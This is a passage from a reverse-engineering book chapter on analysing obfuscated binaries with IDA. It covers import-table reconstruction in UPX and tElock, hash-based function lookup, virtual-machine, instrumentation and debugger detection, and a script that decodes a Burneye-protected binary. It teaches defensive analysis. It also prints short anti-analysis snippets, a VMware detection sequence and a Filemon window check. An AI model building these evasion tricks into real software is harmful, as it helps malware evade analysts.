sidered highly suspicious. Within IDA, the section header for UPX0 contains

the following lines:

UPX0:00401000 ; Section 1. (virtual address 00001000)

UPX0:00401000 ; Virtual size : 00006000 ( 24576.)

UPX0:00401000 ;XSection size in file : 00000000 ( 0.)

UPX0:00401000 ; Offset to raw data for section: 00000200

UPX0:00401000 ;YFlags E0000080: Bss Executable Readable Writable

Techniques for using IDA to perform the decompression operation in a

static context (without actually executing the binary) are discussed in “Static

De-obfuscation of Binaries Using IDA” on page 454.

Imported Function Obfuscation

In order to avoid leaking information about potential actions that a binary

may perform, an additional anti–static analysis technique is aimed at making

it difficult to determine which shared libraries and library functions are used

within an obfuscated binary. In most cases, it is possible to render tools such

as dumpbin, ldd, and objdump ineffective for the purposes of listing library

dependencies.

The effect of such obfuscations on IDA is most obvious in the Imports

window. The entire content of the Imports window for our earlier tElock

example is shown here:

Address Ordinal Name Library

0041EC2E GetModuleHandleA kernel32

0041EC36 MessageBoxA user32

Only two external functions are referenced, GetModulehandleA (from

kernel32.dll) and MessageBoxA (from user32.dll). Virtually nothing about the

behavior of the program can be inferred from this short list. How then does

Obfuscated Code Analysis 445

such a program get anything useful accomplished? Here again the techniques

are varied, but they essentially boil down to the fact that the program itself

must load any additional libraries that it depends on, and once the libraries

are loaded, the program must locate any required functions within those

libraries. In most cases, these tasks are performed by the de-obfuscation stub

prior to transferring control to the de-obfuscated program. The end goal is

for the program’s import table to have been properly initialized, just as if the

process had been performed by the operating system’s own loader.

For Windows binaries, a simple approach is to use the LoadLibrary function

to load required libraries by name and then perform function address lookups

within each library using the GetProcAddress function. In order to use these

functions, a program must be either explicitly linked to them or have an

alternate means of looking them up. The Names listing for the tElock example

does not include either of these functions, while the Names listing for the

UPX example shown here includes both.

Address Ordinal Name Library

0040908C LoadLibraryA KERNEL32

00409090 GetProcAddress KERNEL32

00409094 ExitProcess KERNEL32

0040909C RegCloseKey ADVAPI32

004090A4 atoi CRTDLL

004090AC ExitWindowsEx USER32

004090B4 InternetOpenA WININET

004090BC recv wsock32

The actual UPX code responsible for rebuilding the import table is

shown in Listing 21-1.

UPX1:0040886C loc_40886C: ; CODE XREF: start+12EÈj

UPX1:0040886C mov eax, [edi]

UPX1:0040886E or eax, eax

UPX1:00408870 jz short loc_4088AE

UPX1:00408872 mov ebx, [edi+4]

UPX1:00408875 lea eax, [eax+esi+8000h]

UPX1:0040887C add ebx, esi

UPX1:0040887E push eax

UPX1:0040887F add edi, 8

X UPX1:00408882 call dword ptr [esi+808Ch] ; LoadLibraryA

UPX1:00408888 xchg eax, ebp

UPX1:00408889

UPX1:00408889 loc_408889: ; CODE XREF: start+146Èj

UPX1:00408889 mov al, [edi]

UPX1:0040888B inc edi

UPX1:0040888C or al, al

UPX1:0040888E jz short loc_40886C

UPX1:00408890 mov ecx, edi

UPX1:00408892 push edi

UPX1:00408893 dec eax

UPX1:00408894 repne scasb

UPX1:00408896 push ebp

Y UPX1:00408897 call dword ptr [esi+8090h] ; GetProcAddress

446 Chapter 21

UPX1:0040889D or eax, eax

UPX1:0040889F jz short loc_4088A8

Z UPX1:004088A1 mov [ebx], eax ; Save to import table

UPX1:004088A3 add ebx, 4

UPX1:004088A6 jmp short loc_408889

Listing 21-1: Import table reconstruction in UPX

This example contains an outer loop responsible for calling LoadLibraryA16

X and an inner loop responsible for calling GetProcAddress Y. Following each

successful call to GetProcAddress, the newly retrieved function address is stored

into the reconstructed import table Z.

These loops are executed as the last portion of the UPX de-obfuscation

stub, because each function takes string pointer parameters that point to

either a library name or a function name, and the associated strings are held

within the compressed data region to avoid detection by the strings utility. As

a result, library loading in UPX cannot take place until the required strings

have been decompressed.

Returning to the tElock example, a different problem presents itself. With

only two imported functions, neither of which is LoadLibraryA or GetProcAddress,

how can the tElock utility perform the function-resolution tasks that were

performed by UPX? All Windows processes depend on kernel32.dll, which

means that it is present in memory for all processes. If a program can locate

kernel32.dll, a relatively straightforward process may be followed to locate any

function within the DLL, including LoadLibraryA and GetProcAddress. As shown

previously, with these two functions in hand, it is possible to load any addi-

tional libraries required by the process and locate all required functions

within those libraries. In his paper “Understanding Windows Shellcode,”17

Skape discusses techniques for doing exactly this. While tElock does not use

the exact techniques detailed by Skape, there are many parallels, and the net

effect is to obscure the details of the loading and linking process. Without

carefully tracing the program’s instructions, it is extremely easy to overlook

the loading of a library or the lookup of a function address. The following

small code fragment illustrates the manner in which tElock attempts to

locate the address of LoadLibraryA:

.shrink:0041D1E4 cmp dword ptr [eax], 64616F4Ch

.shrink:0041D1EA jnz short loc_41D226

.shrink:0041D1EC cmp dword ptr [eax+4], 7262694Ch

.shrink:0041D1F3 jnz short loc_41D226

.shrink:0041D1F5 cmp dword ptr [eax+8], 41797261h

.shrink:0041D1FC jnz short loc_41D226

16. Many Windows functions that accept string arguments come in two versions: one that accepts

ASCII strings and one that accepts Unicode strings. The ASCII versions of these functions carry

an A suffix, while the Unicode versions carry a W suffix.

17. See http://www.hick.org/code/skape/papers/win32-shellcode.pdf, specifically Chapter 3,

“Shellcode Basics,” and section 3.3, “Resolving Symbol Addresses.”

Obfuscated Code Analysis 447

It is immediately obvious that several comparisons are taking place in

rapid succession. What may not be immediately clear is the purpose of these

comparisons. Reformatting the operands used in each comparison sheds a

little light on the code, as seen here:

.shrink:0041D1E4 cmp dword ptr [eax], 'daoL'

.shrink:0041D1EA jnz short loc_41D226

.shrink:0041D1EC cmp dword ptr [eax+4], 'rbiL'

.shrink:0041D1F3 jnz short loc_41D226

.shrink:0041D1F5 cmp dword ptr [eax+8], 'Ayra'

.shrink:0041D1FC jnz short loc_41D226

Each hexadecimal constant is actually a sequence of four ASCII charac-

ters, which taken in order (recall that the x86 is a little-endian processor and

we need to read the characters in reverse order) spell LoadLibraryA. If the

three comparisons succeed, then tElock has located the export table entry

for LoadLibraryA, and in a few short operations, the address of this function

will be obtained and available for use in loading additional libraries. An

interesting characteristic of tElock’s approach to function lookup is that it

is somewhat resistant to strings analysis because the 4-byte constants embed-

ded directly in the program’s instructions do not look like more standard,

null-terminated strings and thus do not get included in strings lists generated

by IDA.

Manually reconstructing a program’s import table through careful analysis

of the program’s code is made easier in the case of UPX and tElock because,

ultimately, they both contain ASCII character data that we can use to deter-

mine exactly which libraries and which functions are being referenced.

Skape’s paper details a function-resolution process in which no strings at

all appear within the code. The basic idea discussed in the paper is to pre-

compute a unique hash18 value for the name of each function that you need

to resolve. To resolve each function, a search is conducted through a library’s

exported names table. Each name in the table is hashed, and the resulting

hash is compared against the precomputed hash value for the desired func-

tion. If the hashes match, the desired function has been located, and you can

easily find its address in the library’s export address table. In order to stati-

cally analyze binaries obfuscated in this manner, you need to understand the

hashing algorithm used for each function name and apply that algorithm to

all of the names exported by the library that the program is searching. With

a complete table of hashes in hand, you will be able to do a simple lookup of

each hash that you encounter in the program to determine which function

18. A hash function is a mathematical process that derives a fixed-size result (4 bytes, for example)

from an arbitrary-sized input (such as a string).

448 Chapter 21

the hash references.19 A portion of such a table, generated for kernel32.dll,

might look like this:

X GetProcAddress : 8A0FB5E2

GetProcessAffinityMask : B9756EFE

GetProcessHandleCount : B50EB87C

GetProcessHeap : C246DA44

GetProcessHeaps : A18AAB23

GetProcessId : BE05ED07

Note that the hash values are specific to the hash function being used

within a particular binary and are likely to vary from one binary to another.

Using this particular table, if the hash value 8A0FB5E2 X was encountered

within a program, we could quickly determine that the program was attempt-

ing to look up the address of the GetProcAddress function.

Skape’s use of hash values to resolve function names was originally

developed and documented for use in exploit payloads for Windows vulner-

abilities; however, hash values have been adopted for use in obfuscated pro-

grams as well. The WinLicense obfuscation utility is one example that makes

use of such hashing techniques to disguise its behavior.

A final note on import tables is that, interestingly, IDA is sometimes able

to offer you a clue that something is not quite right with a program’s import

table. Obfuscated Windows binaries often have sufficiently altered import

tables that IDA will notify you that something seems out of the ordinary with

such a binary. Figure 21-3 shows the warning dialog that IDA displays in such

cases.

Figure 21-3: Mangled imports segment warning dialog

This dialog provides one of the earliest indications that a binary may

have been obfuscated in some manner and should serve as a warning that the

binary may be difficult to analyze. Thus, you should take care while analyzing

the binary.

Targeted Attacks on Analysis Tools

This category of anti–reverse engineering capability is mentioned only

because of its unique potential to hinder reverse engineering efforts. Most

reverse engineering tools can be viewed as highly specialized parsers that

19. Hex-Rays discusses IDA’s debugging capabilities to compute such hashes here: http://

www.hexblog.com/?p=93.

Obfuscated Code Analysis 449

process input data to provide some sort of summary information or detail

display. As software, these tools are not immune to the same types of vulner-

abilities that affect all other software. Specifically, incorrect handling of user-

supplied data may, in some cases, lead to exploitable conditions.

In addition to the techniques we have discussed thus far, programmers

intent on preventing analysis of their software may opt for a more active form

of anti–reverse engineering. By properly crafting input files, it may be possible

to create a program that is both valid enough to execute properly and mal-

formed enough to exploit a vulnerability in a reverse engineering tool. Such

vulnerabilities, while uncommon, have been documented to include vulner-

abilities in IDA.20 The goal of the attacker is to exploit the fact that a piece of

malware is likely to get loaded into IDA at some point. At a minimum, the

attacker may achieve a denial of service in which IDA always crashes before a

database can be created; alternatively, the attacker may gain access to the

analyst’s computer and associated network. Users concerned with this type

of attack should consider performing all initial analysis tasks in a sandbox

environment. For example, you might run a copy of IDA in a sandbox to

create the initial database for all binaries. The initial database (which in

theory is free from any malicious capability) can then be distributed to

additional analysts, who need never touch the original binary file.

Anti–Dynamic Analysis Techniques

None of the anti–static analysis techniques covered in the past few sections

have any effect whatsoever on whether a program will actually execute or

not. In fact, while they may make it difficult for you to comprehend the true

behavior of a program using static analysis techniques alone, they can’t pre-

vent the program from executing, or they would render a program useless

from the start and therefore eliminate the need to analyze the program at all.

Given that a program must run in order for it to do any work, dynamic

analysis aims to observe the behavior of a program in motion (while it is run-

ning) rather than observe the program at rest (using static analysis while the

program is not running). In this section we briefly summarize some of the

more common anti–dynamic analysis techniques. For the most part, these

techniques have little effect on static analysis tools; however, where there is

overlap, we will point this out. We will return to discuss the impact of many

of these techniques on IDA’s integrated debugger beginning in Chapter 24.

Detecting Virtualization

One of the most common choices for configuring a sandbox environment is

to make use of virtualization software, such as VMware, to provide an execu-

tion environment for malicious software (or, for that matter, any other soft-

ware of interest). The advantage of such environments is that they typically

offer checkpoint and rollback capabilities that facilitate rapid restoration of

the sandbox to a known clean state. The primary disadvantage of using such

20. See http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0115. More detail is available at

http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=189.

450 Chapter 21

environments as the foundation for a sandbox is the fact that it is fairly easy

(especially on 32-bit x86 platforms) for a program to detect that it is running

within a virtualized environment. Under the assumption that virtualization

equates to observation, many programs that want to remain undetected simply

choose to shut down once they determine that they are running within a

virtual machine.

The following list describes a few of the techniques that have been used

by programs running in virtualized environments to determine that they are

running within a virtual machine rather than on native hardware.

Detection of virtualization-specific software

Users often install helper applications within virtual machines to

facilitate communications between a virtual machine and its host operat-

ing system or simply to improve performance within the virtual machine.

The VMware Tools collection is one example of such software. The

presence of such software is easily detected by programs running within

the virtual machine. For example, when VMware Tools is installed into a

Microsoft Windows virtual machine, it creates Windows registry entries

that can be read by any program. VMware Tools is rarely required in

order to run malware within a virtual environment and should not be

installed so as to eliminate such trivially detectable traces of the virtual

machine.

Detection of virtualization-specific hardware

Virtual machines make use of virtual hardware abstraction layers to pro-

vide the interface between the virtual machine and the host computer’s

native hardware. Characteristics of the virtual hardware are often easily

detectable by software running within the virtual machine. For example,

VMware has been assigned its own organizationally unique identifiers

(OUI)21 for use with its virtualized network adapters. Observing a

VMware-specific OUI is a good indication that a program is running

within a virtual machine. Note that it is usually possible to modify the

MAC address assigned to virtual network adapters using configuration

options on the host computer.

Detection of virtual machine–specific behaviors

Some virtualization platforms contain backdoor-style communications

channels to facilitate communications between a virtual machine and its

host software. For example, the following five lines may be used to deter-

mine if you are running within a VMware virtual machine:22

mov eax, 0x564D5868 ; 'VMXh'

mov ecx, 10

xor ebx, ebx

mov dx, 0x5658 ; 'VX'

Xin eax, dx

21. An OUI makes up the first three bytes of a network adapter’s factory-assigned MAC address.

22. See http://www.codeproject.com/KB/system/VmDetect.aspx by Elias Bachaalany.

Obfuscated Code Analysis 451

The sequence will result in the EBX register containing the value

0x564D5868 if you are inside a virtual machine. If you are not within a vir-

tual machine, the code will result in either an exception or no change to

EBX, depending on the host operating system in use. This instruction

sequence takes advantage of the fact that the x86 in instruction X is

generally not used or allowed in user-space programs; however, within

VMware, the instruction sequence can be used to test for the presence

of the channel used by VMware guest operating systems to communi-

cate with their host operating system. This channel is used by VMware

Tools, for example, to facilitate the exchange of data (such as clipboard

contents) between the host and guest operating systems.

Detection of processor-specific behavioral changes

Perfect virtualization is a difficult thing to achieve. Ideally a program

should not be able to detect any difference between a virtualized environ-

ment and native hardware. However, this is seldom the case. Joanna

Rutkowska developed her redpill23 VMware-detection technique after

observing behavioral differences between the operation of the x86 sidt

instruction on native hardware and the same instruction executed within

a virtual machine environment.

Though it is not the first paper on the topic, “On the Cutting Edge:

Thwarting Virtual Machine Detection” by Tom Liston and Ed Skoudis24

presents a nice overview of virtual machine–detection techniques.

Detecting Instrumentation

Following creation of your sandbox environment and prior to executing any

program you want to observe, you need to ensure that instrumentation is in

place to properly collect and record information about the behavior of the

program you are analyzing. A wide variety of tools exists for performing

such monitoring tasks. Two widely used examples include Process Monitor,25

from the Sysinternals group26 at Microsoft, and Wireshark.27 Process Monitor

is a utility capable of monitoring certain activities associated with any run-

ning Windows process, including accesses to the Windows registry and file

system activity. Wireshark is a network packet capture and analysis tool often

used to analyze the network traffic generated by malicious software.

Malware authors with a sufficient level of paranoia may program their

software to search for running instances of such monitoring programs. Tech-

niques range from scanning the active process list for process names known

to be associated with such monitoring software to scanning the title bar text for

all active Windows applications to search for known strings. Deeper searches

can be performed, with some software going so far as to search for specific

characteristics associated with Windows GUI components used within certain

23. See http://www.invisiblethings.org/papers/redpill.html.

24. See http://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf.

25. See http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx.

26. See http://technet.microsoft.com/en-us/sysinternals/default.aspx.

27. See http://www.wireshark.org/.

452 Chapter 21

instrumentation software. For example, the WinLicense obfuscation/pro-

tection program uses the following function call to attempt to determine

whether the Filemon (a predecessor of Process Monitor) utility is currently

executing:

if (FindWindow("FilemonClass", NULL)) {

//exit because Filemon is running

}

In this case, the FindWindow function is being used to search for a top-level

application window based on the registered class name ("FilemonClass")

of the window rather than the window’s title. If a window of the requested

class is located, then Filemon is assumed to be executing, and the program

terminates.

Detecting Debuggers

Moving beyond simple observation of a program, the use of a debugger allows

an analyst to take complete control of the execution of program that requires

analyzing. A common use of a debugger with obfuscated programs is to run

the obfuscated program just long enough to complete any decompression or

decryption tasks and then utilize the debugger’s memory-access features to

extract the de-obfuscated process image from memory. In most cases, standard

static analysis tools and techniques can be used to complete the analysis of

the extracted process image.

The authors of obfuscation utilities are well aware of such debugger-

assisted de-obfuscation techniques, so they have developed measures to

attempt to defeat the use of debuggers for execution of their obfuscated

programs. Programs that detect the presence of a debugger often choose to

terminate rather than proceed with any operations that might allow an analyst

to more easily determine the behavior of the program.

Techniques for detecting the presence of debuggers range from simple

queries to the operating system via well-known API functions, such as the

Windows IsDebuggerPresent function, to lower-level checks for memory or

processor artifacts resulting from the use of a debugger. An example of the

latter includes detecting that a processor’s trace (single-step) flag is set.

Detection of specific debuggers is also possible in some cases. For example,

SoftIce, a Windows kernel debugger, can be detected through the presence

of the "\\.\NTICE" device, which is used to communicate with the debugger.

As long as you know what to look for, there is nothing terribly tricky

about trying to detect a debugger, and attempts to do so are easily observed

during static analysis (unless anti–static analysis techniques are employed

simultaneously). For more information on debugger detection, consult

Obfuscated Code Analysis 453

Nicolas Falliere’s article “Windows Anti-Debug Reference,”28 which provides

a comprehensive overview of Windows anti-debugging techniques.29 In addi-

tion, OpenRCE maintains an Anti Reverse Engineering Techniques Data-

base,30 which contains a number of debugger-specific techniques.

Preventing Debugging

If a debugger manages to remain undetectable, there are still a number of

techniques available to thwart its use. These additional techniques attempt to

confound the debugger by introducing spurious breakpoints, clearing hard-

ware breakpoints, hindering disassembly to make selection of appropriate

breakpoint addresses difficult, or preventing the debugger from attaching

to a process in the first place. Many of the techniques discussed in Nicolas

Falliere’s article are geared toward preventing debuggers from operating

correctly.

Intentionally generating exceptions is one means by which a program

may attempt to hinder debugging. In most cases, an attached debugger will

catch the exception, and the user of the debugger is faced with the task of

analyzing why the exception occurred and whether to pass the exception

along to the program being debugged. In the case of a software breakpoint

such as the x86 int 3, it may be difficult to distinguish a software interrupt

generated by the underlying program from one that results from an actual

debugger breakpoint. This confusion is exactly the effect that is desired by

the creator of the obfuscated program. In such cases, careful analysis of the

disassembly listing to understand the true program flow is usually possible,

though the level of effort for static analysis is raised somewhat.

Encoding portions of a program in some manner has the dual effect of

hindering static analysis because disassembly is not possible and of hindering

debugging because placing breakpoints is difficult. Even if the start of each

instruction is known, software breakpoints cannot be placed until the instruc-

tions have actually been decoded, as altering the instructions by inserting a

software breakpoint is likely to result in a failed decryption of the obfuscated

code and a resulting crash of the program when execution reaches the

intended breakpoint.

Alternatively, some de-obfuscation routines compute checksum values

over ranges of bytes within the process. If one or more software breakpoints

have been set within the range over which a checksum is being computed,

the resulting checksum will be incorrect, and the program is likely to abort.

The Shiva ELF obfuscation tool for Linux makes use of a technique called

mutual ptrace to prevent the use of a debugger in analyzing Shiva’s behavior.

28. See http://www.symantec.com/connect/articles/windows-anti-debug-reference/.

29. See http://pferrie.tripod.com/papers/unpackers.pdf/ by Peter Ferrie.

30. See http://www.openrce.org/reference_library/anti_reversing/.

454 Chapter 21

Shiva takes advantage of the fact that a process may be ptraced by only

one other process at any given time. Early in its execution, the Shiva process

forks to create a copy of itself. The original Shiva process immediately per-

forms a ptrace attach operation on the newly forked child. The newly forked

child process, in turn, immediately attaches to its parent process. If either

attach operation fails, Shiva terminates under the assumption that another

debugger is being used to monitor the Shiva process. If both operations suc-

ceed, then no other debugger can be used to attach to the running Shiva

pair, and Shiva can continue to run without fear of being observed. While

operating in this manner, either Shiva process may alter the state of the

other, making it difficult to determine, using static analysis techniques, what

the exact control flow path is through the Shiva binary.

Static De-obfuscation of Binaries Using IDA

At this point you may be wondering how, given all of the anti–reverse engi-

neering techniques available, it is possible to analyze software that a program-

mer is intent on keeping secret. Given that these techniques target both static

analysis tools and dynamic analysis tools, what is the best approach to take in

revealing a program’s hidden behavior? Unfortunately, there is no single solu-

tion that fits all cases equally well. In most cases, the solution depends on

your skill set and the tools available to you. If your analysis tool of choice is a

debugger, then you will need to develop strategies for circumventing debug-

ger detection and prevention protections. If your preferred analysis tool is a

disassembler, you will need to develop strategies for obtaining an accurate dis-

assembly and, in cases in which self-modifying code is encountered, for mim-

icking the behavior of that code in order to properly update your disassembly

listings.

In this section we will discuss two techniques for dealing with self-

modifying code in a static analysis environment (that is, without executing

the code). Static analysis may be your only option for cases in which you are

PROCESS TRACING

The ptrace, or process tracing, API is available on many Unix systems and provides

a mechanism for one process to monitor and control the execution of another process.

The GNU debugger (gdb) is one of the more well-known applications that makes use

of the ptrace API. Using the ptrace API, a ptrace parent process may attach to and

control the execution of a ptrace child process. In order to begin controlling a pro-

cess, a parent process must first attach to the child process that it seeks to control.

Once attached, the child process is stopped anytime it receives a signal, and the

parent is notified of this fact via the POSIX wait function, at which point the parent

may choose to alter or inspect the state of the child process before instructing the

child process to continue execution. Once a parent process has attached to a child

process, no other process may attach to the same child process until the tracing par-

ent chooses to detach from the child process.

Obfuscated Code Analysis 455

unwilling (because of hostile code) or unable (because of a lack of hardware

or appropriate sandbox environment) to analyze a program while control-

ling it with a debugger.

Script-Oriented De-obfuscation

Because IDA may be used to disassemble binaries developed for a number of

different CPU types, it is not uncommon to analyze a binary developed for an

entirely different platform than the one on which you are running IDA. For

example, you may be asked to analyze a Linux x86 binary even though you

happen to run the Windows version of IDA, or you may be asked to analyze a

MIPS or ARM binary even though IDA runs only on x86 platforms. In such

cases you may not have access to dynamic analysis tools, such as debuggers,

suitable for use in performing dynamic analysis on the binary you have been

given. When such a binary has been obfuscated by encoding portions of the

program, you may have no other option than to create an IDA script that will

mimic the de-obfuscating stage of the program in order to properly decode

the program and disassemble the decoded instructions and data.

This may seem like a daunting task. However, in many cases the decod-

ing stages of an obfuscated program make use of only a small subset of a

processor’s instruction set, so familiarizing yourself with the necessary opera-

tions may not require an understanding of the entire instruction set for the

target CPU.

Chapter 15 presented an algorithm for developing scripts that emulate

the behavior of portions of a program. In the following example, we will

utilize those steps to develop a simple IDC script to decode a program that

has been encrypted with the Burneye ELF encryption tool. In our example

program, execution begins with the instructions in Listing 21-2.

LOAD:05371035 start proc near

LOAD:05371035

X LOAD:05371035 push off_5371008

Y LOAD:0537103B pushf

Z LOAD:0537103C pusha

[ LOAD:0537103D mov ecx, dword_5371000

LOAD:05371043 jmp loc_5371082

...

LOAD:05371082 loc_5371082: ; CODE XREF: start+EÇj

\ LOAD:05371082 call sub_5371048

LOAD:05371087 sal byte ptr [ebx-2Bh], 1

LOAD:0537108A pushf

LOAD:0537108B xchg al, [edx-11h]

LOAD:0537108E pop ss

LOAD:0537108F xchg eax, esp

LOAD:05371090 cwde

LOAD:05371091 aad 8Eh

LOAD:05371093 push ecx

] LOAD:05371094 out dx, eax

LOAD:05371095 add [edx-57E411A0h], bh

LOAD:0537109B push ss

LOAD:0537109C rcr dword ptr [esi+0Ch], cl

456 Chapter 21

LOAD:0537109F push cs

LOAD:053710A0 sub al, 70h

LOAD:053710A2 cmp ch, [eax+6Eh]

LOAD:053710A5 cmp dword ptr ds:0CBD35372h, 9C38A8BCh

LOAD:053710AF and al, 0F4h

^ LOAD:053710B1 db 67h

Listing 21-2: Burneye startup sequence and obfuscated code

The program begins by pushing the contents of memory location

05371008h onto the stack X before pushing the CPU flags Y and then pushing

all CPU registers Z. The purpose of these instructions is not immediately

clear, so we simply file this information away for later. Next, the ECX register

is loaded with the contents of memory location 5371000h [. According to the

algorithm presented in Chapter 15, we need to declare a variable named ecx

at this point and initialize it from memory using IDC’s Dword function, as

shown here:

auto ecx;

ecx = Dword(0x5371000); //from instruction 0537103D

Following an absolute jump, the program calls function sub_5371048 \,

which has the side effect of pushing address 05371087h (the return address)

onto the stack. Note that the disassembled instructions that follow the call

instruction begin to make less and less sense. The out instruction ] is not

generally encountered in user-space code, while IDA is unable to disassemble

an instruction at address 053710B1h ^. These are both indications that some-

thing is not quite right with this binary (that and the fact that the Functions

window lists only two functions).

At this point, analysis needs to continue with function sub_5371048, which

is shown in Listing 21-3.

LOAD:05371048 sub_5371048 proc near ; CODE XREF: start:loc_5371082Èp

X LOAD:05371048 pop esi

Y LOAD:05371049 mov edi, esi

Z LOAD:0537104B mov ebx, dword_5371004

LOAD:05371051 or ebx, ebx

\ LOAD:05371053 jz loc_537107F

[ LOAD:05371059 xor edx, edx

] LOAD:0537105B loc_537105B: ; CODE XREF: sub_5371048+35Èj

LOAD:0537105B mov eax, 8

^ LOAD:05371060 loc_5371060: ; CODE XREF: sub_5371048+2BÈj

LOAD:05371060 shrd edx, ebx, 1

LOAD:05371064 shr ebx, 1

LOAD:05371066 jnb loc_5371072

LOAD:0537106C xor ebx, 0C0000057h

LOAD:05371072 loc_5371072: ; CODE XREF: sub_5371048+1EÇj

LOAD:05371072 dec eax

LOAD:05371073 jnz short loc_5371060

LOAD:05371075 shr edx, 18h

LOAD:05371078 lodsb

Obfuscated Code Analysis 457

LOAD:05371079 xor al, dl

LOAD:0537107B stosb

LOAD:0537107C dec ecx

LOAD:0537107D jnz short loc_537105B

LOAD:0537107F loc_537107F: ; CODE XREF: sub_5371048+BÇj

LOAD:0537107F popa

LOAD:05371080 popf

LOAD:05371081 retn

Listing 21-3: Main Burneye decoding function

Closer inspection reveals that this is not a typical function in that it

begins by immediately popping the return address off the stack into the

ESI register X. Recalling that the saved return address was 05371087h, and

taking into account the initialization of EDI Y, EBX Z, and EDX [, our

script grows to the following:

auto ecx, esi, edi, ebx, edx;

ecx = Dword(0x5371000); //from instruction 0537103D

esi = 0x05371087; //from instruction 05371048

edi = esi; //from instruction 05371049

ebx = Dword(0x5371004); //from instruction 0537104B

edx = 0; //from instruction 05371059

Following these initializations, the function performs a test on the value

contained in the EBX register \ before entering an outer loop ] and an

inner loop ^. The remaining logic of the function is captured in the follow-

ing completed script. Within the script, comments are used to relate script

actions to the corresponding actions in the preceding disassembly listing.

auto ecx, esi, edi, ebx, edx, eax, cf;

ecx = Dword(0x5371000); //from instruction 0537103D

esi = 0x05371087; //from instruction 05371048

edi = esi; //from instruction 05371049

ebx = Dword(0x5371004); //from instruction 0537104B

if (ebx != 0) { //from instructions 05371051 and 05371053

edx = 0; //from instruction 05371059

do {

eax = 8; //from instruction 0537105B

do {

//IDC does not offer an equivalent of the x86 shrd instruction so we

//need to derive the behavior using several operations

X edx = (edx >> 1) & 0x7FFFFFFF; //perform unsigned shift right one bit

cf = ebx & 1; //remember the low bit of ebx

if (cf == 1) { //cf represents the x86 carry flag

edx = edx | 0x80000000; //shift in the low bit of ebx if it is 1

}

ebx = (ebx >> 1) & 0x7FFFFFFF; //perform unsigned shift right one bit

if (cf == 1) { //from instruction 05371066

ebx = ebx ^ 0xC0000057; //from instruction 0537106C

}

eax--; //from instruction 05371072

} while (eax != 0); //from instruction 05371073

458 Chapter 21

Y edx = (edx >> 24) & 0xFF; //perform unsigned shift right 24 bits

Z eax = Byte(esi++); //from instruction 05371078

eax = eax ^ edx; //from instruction 05371079

[ PatchByte(edi++, eax); //from instruction 0537107B

ecx--; //from instruction 0537107C

} while (ecx != 0); //from instruction 0537107D

}

There are two minor points to raise with this example. First, the right

shift operator (>>) in IDC performs signed shifts (meaning that the sign bit

is replicated into the most significant bit), while the x86 shr and shrd instruc-

tions perform unsigned shifts. In order to emulate an unsigned right shift in

IDC, we must clear all bits that have been shifted in from the left, as is done

at X and Y. The second point involves the choice of an appropriate data size

and variable to properly implement the x86 lodsb (load string byte) and stosb

(store string byte) instructions. These instructions write to (lodsb) and read

from (stosb) the low-order 8 bits of the EAX register,31 leaving the upper

24 bits unchanged. In IDC, there is no way to partition a variable into bit-

sized portions other than using various bitwise operations to mask off and

recombine portions of the variable. Specifically, in the case of the lodsb

instruction, a more faithful emulation would read as follows:

eax = (eax & 0xFFFFFF00) | (Byte(esi++) & 0xFF);

This example first clears the low 8 bits of the EAX variable and then

merges in the new value for the low 8 bits using an OR operation. In the

Burneye decoding example, we make note of the fact that the entire EAX

of zeroing the upper 24 bits of EAX. As a result, we have elected to simplify

our implementation of lodsb Z by ignoring the effect of the assignment on

the upper 24 bits of EAX. No thought need be given to our implementation

of stosb [, as the PatchByte function reads only from the low-order 8 bits of its

input value (EAX in this case).

Following execution of the Burneye decoding IDC script, our database

would reflect all of the changes that would normally not be observable until

the obfuscated program was executed on a Linux system. If the de-obfuscation

process was carried out properly, we are very likely to see many more legible

strings within IDA’s Strings window. In order to observe this fact, you may

need to refresh the Strings window content by closing and reopening the

window or by right-clicking within the window, selecting Setup, and then

clicking OK. Either action causes IDA to rescan the database for string content.

Remaining tasks include determining where the decoding function will

return, given that it popped its return address in the very first instruction of

the function, along with coaxing IDA to properly display the decoded byte

31. The low-order 8 bits of the EAX register are also referred to as the AL register.

Obfuscated Code Analysis 459

values as instructions or data as appropriate. The Burneye decoding function

ends with the following three instructions:

LOAD:0537107F popa

LOAD:05371080 popf

LOAD:05371081 retn

Recall that the function began by popping its own return address, which

means that the remaining stack values were set up by the caller. The popa

and popf instructions used here are the counterparts to the pusha and pushf

instructions used at the beginning of Burneye’s start routine, as shown here:

LOAD:05371035 start proc near

LOAD:05371035

X LOAD:05371035 push off_5371008

LOAD:0537103B pushf

LOAD:0537103C pusha

The net result is that the only value that remains on the stack is the

one that was pushed at the first line of start X. It is to this location that the

Burneye decoding routine returns, and it is at this location that further analysis

of the Burneye protected binary would need to continue.

The preceding example may make it seem like writing a script to decode

or unpack an obfuscated binary is a relatively easy thing to do. This is true in

the case of Burneye, which does not use a terribly sophisticated initial obfusca-

tion algorithm. The de-obfuscation stub of more sophisticated utilities such

as ASPack and tElock would require somewhat more effort to implement

using IDC.

Advantages to script-based de-obfuscation include the fact that the binary

being analyzed need never be executed and that it is possible to create a

functional script without ever developing a complete understanding of the

exact algorithm used to de-obfuscate the binary. This latter statement may

seem counterintuitive, as it would seem that you would need to have a com-

plete understanding of the de-obfuscation before you could emulate the

algorithm using a script. Using the development process described here and

in Chapter 15, however, all you really need is a complete understanding of

each CPU instruction involved in the de-obfuscation process. By faithfully

implementing each CPU action using IDC and properly sequencing each

action according to the disassembly listing, you will have a script that mimics

the program’s actions even if you do not fully comprehend the higher-level

algorithm that those actions, as a whole, implement.

Disadvantages of using a script-based approach include the fact that the

scripts are rather fragile. If a de-obfuscation algorithm changes as a result of

an upgrade to a de-obfuscation tool or through the use of alternate command-

line settings supplied to the obfuscation tool, it is quite likely that a script that

had been effective against that tool will need to be modified accordingly. For

example, it is possible to develop a generic unpacking script for use with bina-

ries packed using UPX,32 but such a script requires constant tuning as UPX

evolves.

460 Chapter 21

Finally, scripted de-obfuscation suffers from the lack of a one-size-fits-all

solution to de-obfuscation. There is no megascript capable of de-obfuscating

all binaries. In a sense, scripted de-obfuscation suffers from many of the same

shortcomings as signature-based intrusion-detection and antivirus systems. A

new script must be developed for each new type of packer, and subtle changes

in existing packers are likely to break existing scripts.

Emulation-Oriented De-obfuscation

A recurring theme encountered when creating scripts to perform de-

obfuscation tasks is the need to emulate a CPU’s instruction set so the script

behaves identically to the program being de-obfuscated. If we had an actual

instruction emulator at our disposal, it might be possible to shift some or

all of the work performed by these scripts over to the emulator and drastically

